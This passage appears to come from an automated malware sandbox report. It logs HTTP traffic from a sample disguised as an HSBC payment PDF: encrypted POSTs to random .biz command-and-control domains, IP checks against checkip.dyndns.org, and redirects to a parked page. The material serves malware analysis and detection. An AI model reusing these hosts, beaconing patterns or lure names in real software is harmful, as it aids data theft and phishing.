                                                                                                                                                                              Set-Cookie: btst=c8529f88a23a1473b2c4eb68005a87ca|8.46.123.175|1733905569|1733905569|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.54970618.141.10.107801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:09.390573978 CET346OUTPOST /jji HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:09.390573978 CET850OUTData Raw: 67 06 df e1 23 b7 5e ee 46 03 00 00 d4 95 eb a2 59 06 3a 98 71 7f c0 19 25 16 4a 64 fa 49 7d d7 50 f2 d1 27 66 03 fd 67 11 28 40 1c 80 37 7e 4e 8c 06 ee 81 39 e1 a1 f3 0e df 98 1f f0 ef 11 6d 5e af 91 3b ff a6 0b de 1f 4c 07 64 3b 22 fa 68 09 03
                                                                                                                                                                              Data Ascii: g#^FY:q%JdI}P'fg(@7~N9m^;Ld;"hngMuBHSpO~h@LqM10C~.(bg~R2AT/Tq{t {;`aJe'g>h4+6#}0 :!U{eV9{@!Z/Z
                                                                                                                                                                              Dec 11, 2024 09:26:11.482453108 CET411INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:11 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=71d15fdeb3553ba37d25f6c980a76286|8.46.123.175|1733905571|1733905571|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.54970718.141.10.107801900C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:10.574706078 CET355OUTPOST /xxitmchctwqm HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 892
                                                                                                                                                                              Dec 11, 2024 09:26:10.574822903 CET892OUTData Raw: f3 1e 46 09 81 83 2d 50 70 03 00 00 29 40 4b d3 00 58 42 4d 41 d1 f9 1b 77 54 6d fa 3f 28 b0 48 15 59 6b b0 d4 ad a1 a9 36 12 6e 93 2f cb fc 10 e5 69 42 ba aa ef 60 37 c5 ad c9 79 0c 0b 39 94 62 2f ac 13 40 d6 50 bb 80 9e 49 94 01 a3 ee 60 81 ac
                                                                                                                                                                              Data Ascii: F-Pp)@KXBMAwTm?(HYk6n/iB`7y9b/@PI`C3pq,tFR>\"a'G4/xh/.@)hw;HG$$nKx$vElc1c/9.hx+6O'|q
                                                                                                                                                                              Dec 11, 2024 09:26:12.597376108 CET411INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:12 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=ab5ba53552658635c603ec7ec592bdab|8.46.123.175|1733905572|1733905572|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.54970854.244.188.177801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET356OUTPOST /yfypviummaqwyuq HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: cvgrf.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET850OUTData Raw: 2c 64 c2 4c b2 9e ee 79 46 03 00 00 d2 73 76 d1 5d 10 5d 0d 1d f3 d8 be 79 7c 0e b3 56 de b2 20 5c 91 bf 40 09 e3 ff d6 b0 f9 17 5b f9 da 75 b0 4d df 84 ac fd 83 42 ab ce 9e b3 fc 76 0a 24 c5 ac 9d 55 7c a2 26 a7 7a f9 09 59 08 87 12 b5 3f 77 55
                                                                                                                                                                              Data Ascii: ,dLyFsv]]y|V \@[uMBv$U|&zY?wUsK*,SKeg!+dB"wT4;+rO<'mE;Q`5%q%NAPv+}wpv8VFK,;h[:um=X;{p{F_1L
                                                                                                                                                                              Dec 11, 2024 09:26:13.539892912 CET409INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:13 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=1896e6d0cf42eea53eefff63fe23976c|8.46.123.175|1733905573|1733905573|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.549709193.122.6.168807188C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:13.223695993 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
Dec 11, 2024 09:26:14.493051052 CET | 321 bytes | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 08:26:14 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 468fbb04354184ba67f0ab6df26a887c
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 11, 2024 09:26:14.497525930 CET | 127 bytes | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 11, 2024 09:26:14.903294086 CET | 321 bytes | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 08:26:14 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 84d48e61fb278cbdc904ffe996f14bfd
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 11, 2024 09:26:21.864192009 CET | 127 bytes | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 11, 2024 09:26:22.270047903 CET | 321 bytes | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 08:26:22 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1c313a9678119b57abce91e3559a0265
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49710 | 44.221.84.105 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:14.238643885 CET | 353 bytes | OUT | POST /gjuvotllw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 11, 2024 09:26:14.238643885 CET | 850 bytes | OUT | Data Raw: c5 d9 70 a4 cf ee e1 8a 46 03 00 00 b1 bd 72 94 29 79 b4 4d ee ef f7 93 52 90 ea 4d ea 9e 2f da 5c f0 41 45 c5 58 b5 87 df d2 e1 df 35 4e 38 5f 8a a9 07 36 60 88 e0 b8 63 ce 84 37 d6 e9 2a 3d cd 60 12 66 65 9e 13 22 29 41 46 0c 46 97 c5 50 fb 33
    Data Ascii: pFr)yMRM/\AEX5N8_6`c7*=`fe")AFFP3Y"E6e7In8_[s^H,bf_FiqD7aPZQ}c}nE0w$'1 %O:3SeX+'>s~$xsr)],|c
Dec 11, 2024 09:26:15.337960005 CET | 412 bytes | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 11 Dec 2024 08:26:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b3206ca6d5587b87fa637a002e02ea2c|8.46.123.175|1733905575|1733905575|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49712 | 172.234.222.138 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:16.042012930 CET | 348 bytes | OUT | POST /iwsxa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 11, 2024 09:26:16.042012930 CET | 850 bytes | OUT | Data Raw: 2e d1 a4 a7 18 8b 53 46 46 03 00 00 89 f4 37 b3 7d 0a fc 98 68 dc d5 a9 4e 38 71 f8 fd b2 7e 49 c6 67 dd dc 04 e2 16 b5 e1 92 a5 37 ad 04 e8 24 c8 b7 b8 e3 63 be 1b 71 af 9b 59 d9 7e bd 15 50 e2 44 b9 5f 30 b6 c4 e5 ec 91 3b 7d 15 76 1c 99 18 20
    Data Ascii: .SFF7}hN8q~Ig7$cqY~PD_0;}v AxWC1\^jO+&8H*e-:|(==)1M'OO> V!gYW^CiACNWqO`^M@PMo0@{Y#?z`O.hr
Dec 11, 2024 09:26:17.188370943 CET | 467 bytes | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Wed, 11 Dec 2024 08:26:17 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/iwsxa
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 11, 2024 09:26:22.781728983 CET | 357 bytes | OUT | POST /snsobwmcccpnrm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Dec 11, 2024 09:26:22.781763077 CET | 850 bytes | OUT | Data Raw: ad 88 d4 44 2a 4b 20 e4 46 03 00 00 02 f0 e4 a2 ce 8a 88 05 65 33 3d 3b e4 5d c6 6c 56 9a d8 5e c1 bc d6 a2 eb e8 a2 ec 73 9d 3f c0 c6 f2 79 c7 11 e3 7f 6c d8 82 c1 2c 5a a3 c0 96 31 bf cd 75 64 fa 3d 66 df 1e 76 b5 57 e1 e5 57 07 68 50 5e 61 04
    Data Ascii: D*K Fe3=;]lV^s?yl,Z1ud=fvWWhP^a@t`f7>\gy=CV<#\ryry_,S@s!D?>*+;al*KHe)]rlIF8C_">U,hadm$a{^yr,G-I
Dec 11, 2024 09:26:23.120907068 CET | 476 bytes | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Wed, 11 Dec 2024 08:26:22 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/snsobwmcccpnrm
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49713 | 72.52.179.174 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:17.465089083 CET | 331 bytes | OUT | GET /iwsxa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 11, 2024 09:26:20.718612909 CET | 279 bytes | IN | HTTP/1.1 302 Moved Temporarily
    Date: Wed, 11 Dec 2024 08:26:20 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *
Dec 11, 2024 09:26:23.381673098 CET | 340 bytes | OUT | GET /snsobwmcccpnrm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 11, 2024 09:26:24.547502995 CET | 288 bytes | IN | HTTP/1.1 302 Moved Temporarily
    Date: Wed, 11 Dec 2024 08:26:24 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49715 | 13.248.148.254 | 80 | 1972 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:26:21.250545979 CET | 355 | OUT | GET /iwsxa?usid=25&utid=8132645662 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww12.przvgke.biz
Dec 11, 2024 09:26:22.554306030 CET | 825 | IN | HTTP/1.1 200 OK
Accept-Ch: viewport-width
Accept-Ch: dpr
Accept-Ch: device-memory
Accept-Ch: rtt
Accept-Ch: downlink
Accept-Ch: ect
Accept-Ch: ua
Accept-Ch: ua-full-version
Accept-Ch: ua-platform
Accept-Ch: ua-platform-version
Accept-Ch: ua-arch
Accept-Ch: ua-model
Accept-Ch: ua-mobile
Accept-Ch-Lifetime: 30
Content-Type: text/html; charset=UTF-8
Date: Wed, 11 Dec 2024 08:26:22 GMT
Server: Caddy
Server: nginx
Vary: Accept-Encoding
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Zt2r4BpQytAyzx39iK0B0lSzV0rD/Wm45LSqczltRWvwOYaESImcebYTCqqsfhakfUINr+vqhPecDey3RZ1c/A==
X-Domain: przvgke.biz
X-Pcrew-Blocked-Reason:
X-Pcrew-Ip-Organization: CenturyLink
X-Subdomain: ww12
Transfer-Encoding: chunked
Dec 11, 2024 09:26:22.554636955 CET | 1236 | IN | Data Raw: 33 63 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
Data Ascii: 3cff<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Zt2r4BpQytAyzx39iK0B0lSzV0rD/Wm45LSqczltRWvwOYaESImcebYTCqqsfhakfUINr
Dec 11, 2024 09:26:22.554822922 CET | 224 | IN | Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
Dec 11, 2024 09:26:22.554830074 CET | 1236 | IN | Data Raw: 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22
Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:
Dec 11, 2024 09:26:22.554857016 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d
Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
Dec 11, 2024 09:26:22.554863930 CET | 1236 | IN | Data Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73
Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNM
Dec 11, 2024 09:26:22.555110931 CET | 1236 | IN | Data Raw: 2f 70 72 69 76 61 63 79 2e 68 74 6d 6c 27 2c 20 27 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 27 2c 20 27 77 69 64 74 68 3d 38 39 30 2c 68 65 69 67 68 74 3d 33 33 30 2c 6c 65 66 74 3d 32 30 30 2c 74 6f 70 3d 32 30 30 2c 6d 65 6e 75 62 61 72 3d 6e
Data Ascii: /privacy.html', 'privacy-policy', 'width=890,height=330,left=200,top=200,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privacy Policy</a><br/><br/><br/><br/> </div></div><script type="text/javascript" langua
Dec 11, 2024 09:26:22.555118084 CET | 1236 | IN | Data Raw: 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 6c 65 74 20 69 73 41 64 75 6c 74 3d 66 61 6c 73 65 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 73 3d 5b 5d 3b 20
Data Ascii: <script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczMzkwNTU4Mi4yNjE6YzUxYmE5OWQ3MmE4YjE1MjBiNWZlNTdkMzQyZGI3NjNmYzE4OTdjYmY5MjgwMDM3Mzk3N2QxZTUxMWFlZTcxOTo2NzU5NGNhZTNmYjU4';
Dec 11, 2024 09:26:22.555124998 CET | 1236 | IN | Data Raw: 74 20 2b 20 27 2f 3f 74 73 3d 27 2c 27 66 6f 6e 74 46 61 6d 69 6c 79 27 3a 20 27 61 72 69 61 6c 27 2c 27 6f 70 74 69 6d 69 7a 65 54 65 72 6d 73 27 3a 20 74 72 75 65 2c 27 6d 61 78 54 65 72 6d 4c 65 6e 67 74 68 27 3a 20 34 30 2c 27 61 64 74 65 73
Data Ascii: t + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold'
Dec 11, 2024 09:26:22.555130959 CET | 1236 | IN | Data Raw: 70 6f 6e 65 6e 74 28 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 29 29 3b 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 63 6f 64 65 20 26 26 20 21 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 29 20 7b 73 74 61 74 75 73 2e 65 72 72
Data Ascii: ponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=errorcode&code=" +
Dec 11, 2024 09:26:22.675265074 CET | 1236 | IN | Data Raw: 74 26 75 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 29 29 3b 7d 20 65 6c 73 65 20 69 66 20 28 28 73 74 61 74 75 73 2e 61 64 75 6c 74 20 3d 3d 3d 20 66 61 6c 73 65
